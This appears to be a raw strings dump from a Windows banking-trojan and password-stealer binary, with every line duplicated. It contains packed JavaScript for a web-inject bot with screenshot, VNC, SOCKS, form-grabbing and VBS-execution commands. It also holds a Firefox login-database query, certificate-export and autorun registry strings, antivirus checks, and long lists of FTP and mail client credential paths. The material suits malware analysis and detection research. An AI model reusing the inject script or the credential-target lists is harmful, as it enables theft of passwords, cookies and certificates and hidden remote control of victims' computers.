j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval('var %s '

eval('var %s '

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

%s.Key = '%s';

%s.Key = '%s';

%s.Hide('%0.8X%0.8X');

%s.Hide('%0.8X%0.8X');

CertificateAuthority

CertificateAuthority

%s.pfx

%s.pfx

cookies.sqlite

cookies.sqlite

cookies.sqlite-journal

cookies.sqlite-journal

ff/%u/cookies.sqlite

ff/%u/cookies.sqlite

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

[%s - X32 EQ PID: %u TID: %u]

[%s - X32 EQ PID: %u TID: %u]

X-Firefox-Spdy

X-Firefox-Spdy

X-WebKit-CSP

X-WebKit-CSP

hXXps://

hXXps://

HTTP/1.1 200 OK

HTTP/1.1 200 OK

Content-Length: %u

Content-Length: %u

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.0

GET /favicon.ico HTTP/1.0

login=%s&pass=%s

login=%s&pass=%s

chrome.dll

chrome.dll

127.0.0.1

127.0.0.1

DrWeb

DrWeb

McAfee.com

McAfee.com

Doctor Web

Doctor Web

Common Files\Doctor Web

Common Files\Doctor Web

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

regsvr32.exe "%s"

regsvr32.exe "%s"

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

[VNC] Parse param error: %s

[VNC] Parse param error: %s

\regsvr32.exe

\regsvr32.exe

[VNC] Fail create process: %u

[VNC] Fail create process: %u

[VNC] Fail inject to process: %u

[VNC] Fail inject to process: %u

fv_%u.avi

fv_%u.avi

#FV_%u

#FV_%u

#FV_%s

#FV_%s

pass.txt

pass.txt

cert.pfx

cert.pfx

PFXImportCertStore

PFXImportCertStore

Crypt32.dll

Crypt32.dll

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3-1", false);

user_pref("network.http.spdy.enabled.v3-1", false);

prefs.js

prefs.js

csrss.exe

csrss.exe

smss.exe

smss.exe

wininit.exe

wininit.exe

services.exe

services.exe

svchost.exe

svchost.exe

lsas.exe

lsas.exe

lsm.exe

lsm.exe

winlogon.exe

winlogon.exe

taskhost.exe

taskhost.exe

HttpEndRequestA

HttpEndRequestA

HttpEndRequestW

HttpEndRequestW

ADVAPI32.DLL

ADVAPI32.DLL

Init in Browser = %u

Init in Browser = %u

Init in Shell = %u

Init in Shell = %u

[Socks] Failt connect BC [%s:%u]

[Socks] Failt connect BC [%s:%u]

[Socks] Fail parse param: %s

[Socks] Fail parse param: %s

Shell Update Exists %s = %s

Shell Update Exists %s = %s

Shell Reload status = %u = %u

Shell Reload status = %u = %u

#cert

#cert

Del Old = %s

Del Old = %s

Del Reg = %s

Del Reg = %s

Fail Save New = %u

Fail Save New = %u

Reg Autorun = %u = %u = %ws = %ws

Reg Autorun = %u = %u = %ws = %ws

Updated fail size %u != %u

Updated fail size %u != %u

Updated RSA Init fail = %u

Updated RSA Init fail = %u

Sign Bad = %u

Sign Bad = %u

Save New File = %u = %u

Save New File = %u = %u

Update_InstallNew = %u = %u

Update_InstallNew = %u = %u

[Pony] Fail Get Pass

[Pony] Fail Get Pass

Start Update: %s = %u

Start Update: %s = %u

download status = %u =%u

download status = %u =%u

Updated status = %u

Updated status = %u

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status[Local]: %u = %u

DL_EXEC Status[Local]: %u = %u

Start Socks addr: %s

Start Socks addr: %s

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Local]: %u

Start Socks Status[Local]: %u

Start VNC addr: %s

Start VNC addr: %s

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Local]: %u

Start VNC Status[Local]: %u

msvcrt.dll

msvcrt.dll

%0.8X%0.8X%c

%0.8X%0.8X%c

firefox.exe

firefox.exe

explorer.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%Program Files%\Mozilla Firefox\

%Program Files%\Mozilla Firefox\

mozsqlite3.dll

mozsqlite3.dll

sqlite3_open

sqlite3_open

sqlite3_exec

sqlite3_exec

sqlite3_close

sqlite3_close

sqlite3_free

sqlite3_free

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

hXXp://

hXXp://

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

\\.\pipe\

\\.\pipe\

PID: %u [%0.2u:%0.2u:%0.2u]

PID: %u [%0.2u:%0.2u:%0.2u]

[BC] Cmd Ver Error

[BC] Cmd Ver Error

[BC] Wait Ping error %u[%u]

[BC] Wait Ping error %u[%u]

[BC] Fail Connect: %u

[BC] Fail Connect: %u

[BC] Fail read cmd

[BC] Fail read cmd

[BC] Cmd need reauth

[BC] Cmd need reauth

[BC] cmd error: %u

[BC] cmd error: %u

[BC] Cmd need disconnect

[BC] Cmd need disconnect

ntdll.dll

ntdll.dll

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

account.cfg

account.cfg

account.cfn

account.cfn

Dir #%u

Dir #%u

.oeaccount

.oeaccount

Software\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

\Microsoft\Windows Mail

\Microsoft\Windows Mail

PopPort

PopPort

PopPassword

PopPassword

SmtpServer

SmtpServer

SmtpPort

SmtpPort

SmtpAccount

SmtpAccount

SmtpPassword

SmtpPassword

abe2869f-9b47-4cd9-a358-c22904dba7f7

abe2869f-9b47-4cd9-a358-c22904dba7f7

MS IE FTP Passwords

MS IE FTP Passwords

RushSite.xml

RushSite.xml

\FTPRush

\FTPRush

bitkinex.ds

bitkinex.ds

NDSites.ini

NDSites.ini

Software\LeechFTP

Software\LeechFTP

bookmark.dat

bookmark.dat

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

sites.db

sites.db

servers.xml

servers.xml

\FTPGetter

\FTPGetter

ESTdb2.dat

ESTdb2.dat

\Estsoft\ALFTP

\Estsoft\ALFTP

QData.dat

QData.dat

SM.arch

SM.arch

FTP .Link\shell\open\command

FTP .Link\shell\open\command

NppFTP.xml

NppFTP.xml

Software\MAS-Soft\FTPInfo\Setup

Software\MAS-Soft\FTPInfo\Setup

ServerList.xml

ServerList.xml

\FTPInfo

\FTPInfo

NovaFTP.db

NovaFTP.db

\INSoftware\NovaFTP

\INSoftware\NovaFTP

\sites.xml

\sites.xml

ftplast.osd

ftplast.osd

\SharedSettings.ccs

\SharedSettings.ccs

\SharedSettings.sqlite

\SharedSettings.sqlite

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.sqlite

\SharedSettings_1_0_5.sqlite

\32BitFtp.ini

\32BitFtp.ini

FTPCON

FTPCON

FTP CONTROL

FTP CONTROL

FTPVoyager.ftp

FTPVoyager.ftp

\RhinoSoft.com

\RhinoSoft.com

FTPVoyager.qc

FTPVoyager.qc

FTPVoyager.Archive

FTPVoyager.Archive

SiteInfo.QFP

SiteInfo.QFP

WinFTP

WinFTP

DeluxeFTP

DeluxeFTP

sites.xml

sites.xml

Staff-FTP

Staff-FTP

sites.ini

sites.ini

FreshFTP

FreshFTP

Software\FlashPeak\BlazeFtp\Settings

Software\FlashPeak\BlazeFtp\Settings

LastPassword

LastPassword

LastPort

LastPort

BlazeFtp

BlazeFtp

site.dat

site.dat

\BlazeFtp

\BlazeFtp

GoFTP

GoFTP

Connections.txt

Connections.txt

3D-FTP

3D-FTP

\3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

EasyFTP

FTPNow

FTPNow

FTP Now

FTP Now

FTPShell

FTPShell

ftpshell.fsi

ftpshell.fsi

ftpsite.ini

ftpsite.ini

FTPList.db

FTPList.db

My FTP

My FTP

project.ini

project.ini

Mailbox.ini

Mailbox.ini

FTP Navigator

FTP Navigator

FTP Commander

FTP Commander

ftplist.txt

ftplist.txt

Software\Sota\FFFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

Software\FTPWare\COREFTP\Sites

FtpPort

FtpPort

Software\Cryer\WebSitePublisher

Software\Cryer\WebSitePublisher

_Password

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

Software\NCH Software\ClassicFTP\FTPAccounts

FtpPassword

FtpPassword

_FtpPassword

_FtpPassword

FtpServer

FtpServer

FtpUserName

FtpUserName

FtpDirectory

FtpDirectory

Software\FTPClient\Sites

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

PortNumber

PortNumber

PassWord

PassWord

Software\South River Technologies\WebDrive\Connections

Software\South River Technologies\WebDrive\Connections

Software\LinasFTP\Site Manager

Software\LinasFTP\Site Manager

FTP destination password

FTP destination password

FTP destination server

FTP destination server

FTP destination port

FTP destination port

FTP destination user

FTP destination user

FTP destination catalog

FTP destination catalog

FTP profiles

FTP profiles

Msi.dll

Msi.dll

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

\PocoSystem.ini

\PocoSystem.ini

accounts.ini

accounts.ini

sites.dat

sites.dat

\LeapWare\LeapFTP

\LeapWare\LeapFTP

unleap.exe

unleap.exe

leapftp

leapftp

FtpIniName

FtpIniName

Software\Ghisler\Windows Commander

Software\Ghisler\Windows Commander

wcx_PTF.ini

wcx_PTF.ini

Server.Pass

Server.Pass

Server.Host

Server.Host

Server.User

Server.User

Server.Port

Server.Port

Last Server Pass

Last Server Pass

Last Server Port

Last Server Port

\sitemanager.xml

\sitemanager.xml

\recentservers.xml

\recentservers.xml

\filezilla.xml

\filezilla.xml

"password" : "

"password" : "

"password":"

"password":"

\drives.js

\drives.js

\ExpanDrive\favorites.js

\ExpanDrive\favorites.js

\ExpanDrive\drives.js

\ExpanDrive\drives.js

wiseftpsrvs.ini

wiseftpsrvs.ini

wisePTF.ini

wisePTF.ini

wiseftpsrvs.bin

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

FTP Count

FTP Count

FTP File%u

FTP File%u

Robo-FTP

Robo-FTP

SOFTWARE\%s\FTPServers

SOFTWARE\%s\FTPServers

user.config

user.config

.duck

.duck

SiteServer %u\Host

SiteServer %u\Host

SiteServer %u\WebUrl

SiteServer %u\WebUrl

SiteServer %u\Remote Directory

SiteServer %u\Remote Directory

SiteServer %u-User

SiteServer %u-User

SiteServer %u-User PW

SiteServer %u-User PW

SiteServer %u\SFTP

SiteServer %u\SFTP

Keychain

Keychain

Software\Nico Mak Computing\WinZip\FTP

Software\Nico Mak Computing\WinZip\FTP

Password

Password

Software\Far\Plugins\FTP\Hosts

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

\win.ini

\win.ini

WS_FTP

WS_FTP

\Ipswitch\WS_FTP

\Ipswitch\WS_FTP

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP

sm.dat

sm.dat

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\CuteFTP

CUTEFTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\Sites.dat

\Sites.dat

\Quick.dat

\Quick.dat

\History.dat

\History.dat

Software\BPFTP\Bullet Proof FTP\Main

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

Software\BPFTP

\SmartFTP

\SmartFTP

Favorites.dat

Favorites.dat

History.dat

History.dat

Software\TurboFTP

Software\TurboFTP

\TurboFTP

\TurboFTP

addrbk.dat

addrbk.dat

quick.dat

quick.dat

Port

Port

Login

Login

PasswordType

PasswordType

profiles.xml

profiles.xml

\FTP Explorer

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

Software\FTP Explorer\Profiles

FtpSite.xml

FtpSite.xml

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3.dll

sqlite3_prepare

sqlite3_prepare

sqlite3_step

sqlite3_step

sqlite3_column_bytes

sqlite3_column_bytes

sqlite3_column_blob

sqlite3_column_blob

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

PTF://

PTF://

signons.sqlite

signons.sqlite

\profiles.ini

\profiles.ini

PathToExe

PathToExe

\Mozilla\Firefox\

\Mozilla\Firefox\

Firefox

Firefox

Software\Mozilla

Software\Mozilla

fireFTPsites.dat

fireFTPsites.dat

\Mozilla\SeaMonkey\

\Mozilla\SeaMonkey\

SeaMonkey

SeaMonkey

\Mozilla\Profiles\

\Mozilla\Profiles\

Mozilla

Mozilla

password 51:b:

password 51:b:

SMTP Email Address

SMTP Email Address

SMTP Server

SMTP Server

SMTP User Name

SMTP User Name

HTTP User

HTTP User

HTTP Server URL

HTTP Server URL

HTTPMail User Name

HTTPMail User Name

HTTPMail Server

HTTPMail Server

SMTP User

SMTP User

POP3 Port

POP3 Port

SMTP Port

SMTP Port

IMAP Port

IMAP Port

POP3 Password2

POP3 Password2

IMAP Password2

IMAP Password2

NNTP Password2

NNTP Password2

HTTPMail Password2

HTTPMail Password2

SMTP Password2

SMTP Password2

POP3 Password

POP3 Password

IMAP Password

IMAP Password

NNTP Password

NNTP Password

HTTPMail Password

HTTPMail Password

SMTP Password

SMTP Password

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

inetcomm server passwords

inetcomm server passwords

outlook account manager passwords

outlook account manager passwords

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Pstorec.dll

Pstorec.dll

[VNC] EXEC: %s

[VNC] EXEC: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[VDESK] Read CMD %u[%u]

[VDESK] Read CMD %u[%u]

[VDESK] NOT AUTH CMD %u

[VDESK] NOT AUTH CMD %u

GetAsyncKeyState

GetAsyncKeyState

USER32.DLL

USER32.DLL

GetKeyboardState

GetKeyboardState

GetKeyState

GetKeyState

?WINMM.DLL

?WINMM.DLL

?DSOUND.DLL

?DSOUND.DLL

ZwConnectPort

ZwConnectPort

NTDLL.DLL

NTDLL.DLL

[VNC] PROCESS=%s

[VNC] PROCESS=%s

\explorer.exe

\explorer.exe

[VNC] SearchApp Status = %u

[VNC] SearchApp Status = %u

[VNC] FileName = %s

[VNC] FileName = %s

[VNC] CmdLine = %s

[VNC] CmdLine = %s

[VNC] W64 Redir OLD=%u

[VNC] W64 Redir OLD=%u

[VNC] CreateProcess Status = %u (%u)

[VNC] CreateProcess Status = %u (%u)

SysShadow

SysShadow

Chrome_WidgetWin_1

Chrome_WidgetWin_1

Chrome_WidgetWin_0

Chrome_WidgetWin_0

d3d10_1.dll

d3d10_1.dll

d3d10_1core.dll

d3d10_1core.dll

d3d10.dll

d3d10.dll

d3d10core.dll

d3d10core.dll

d2d1.dll

d2d1.dll

OPENGL32.dll

OPENGL32.dll

d3d9.dll

d3d9.dll

d3d11.dll

d3d11.dll

Dxtrans.dll

Dxtrans.dll

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

NETAPI32.dll

NETAPI32.dll

SHDeleteKeyA

SHDeleteKeyA

SHLWAPI.dll

SHLWAPI.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

AVIFIL32.dll

AVIFIL32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

CallNamedPipeA

CallNamedPipeA

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeA

CreateNamedPipeA

GetWindowsDirectoryA

GetWindowsDirectoryA

EnumWindows

EnumWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetViewportOrgEx

SetViewportOrgEx

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

CryptImportKey

CryptImportKey

CryptDestroyKey

CryptDestroyKey

RegOpenKeyA

RegOpenKeyA

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

CertOpenSystemStoreA

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertAddCertificateContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

FindCloseUrlCache

FindCloseUrlCache

FindNextUrlCacheEntryW

FindNextUrlCacheEntryW

FindFirstUrlCacheEntryW

FindFirstUrlCacheEntryW

COMDLG32.dll

COMDLG32.dll

WININET.DLL

WININET.DLL

=)=2===~=

=)=2===~=

3 343=3_3

3 343=3_3

= =,=`=}=

= =,=`=}=

.pdata

.pdata

@.reloc

@.reloc

